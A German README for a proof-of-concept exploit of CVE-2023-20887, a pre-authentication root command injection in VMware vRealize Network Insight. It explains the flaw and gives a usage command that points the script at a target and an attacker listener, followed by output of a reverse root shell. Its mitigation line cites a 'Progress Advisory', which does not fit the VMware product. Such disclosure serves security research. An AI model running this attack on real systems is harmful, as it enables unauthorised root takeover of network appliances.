
VMWare vRealize Network Insight vorauthentifizierte RCE (CVE-2023-20887)
POC für CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) nicht authentifizierte RCE
Eine Ursachenanalyse der Schwachstelle ist in meinem Blog zu finden: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

VMWare Aria Operations for Networks (vRealize Network Insight) ist anfällig für Befehlseinschleusung (Command Injection), wenn Benutzereingaben über die Apache Thrift RPC-Schnittstelle akzeptiert werden. Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, beliebige Befehle auf dem zugrunde liegenden Betriebssystem als Root-Benutzer auszuführen. Die RPC-Schnittstelle wird durch einen Reverse Proxy geschützt, der umgangen werden kann. VMware hat die Schwere dieses Problems als kritisch eingestuft, mit einem maximalen CVSSv3-Basiswert von 9,8. Ein Angreifer kann eine Remote-Codeausführung im Kontext von 'root' auf dem Gerät erlangen. VMWare 6.x Versionen sind anfällig.
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
Aktualisieren Sie auf die neueste Version oder mildern Sie die Schwachstelle durch Befolgen der Anweisungen im Progress Advisory.
Diese Software wurde ausschließlich zu Zwecken der akademischen Forschung und zur Entwicklung effektiver Verteidigungstechniken erstellt und ist nicht dazu bestimmt, Systeme anzugreifen, außer wenn dies ausdrücklich genehmigt wurde. Die Projektbetreuer sind nicht verantwortlich oder haftbar für Missbrauch der Software. Verwenden Sie sie verantwortungsbewusst.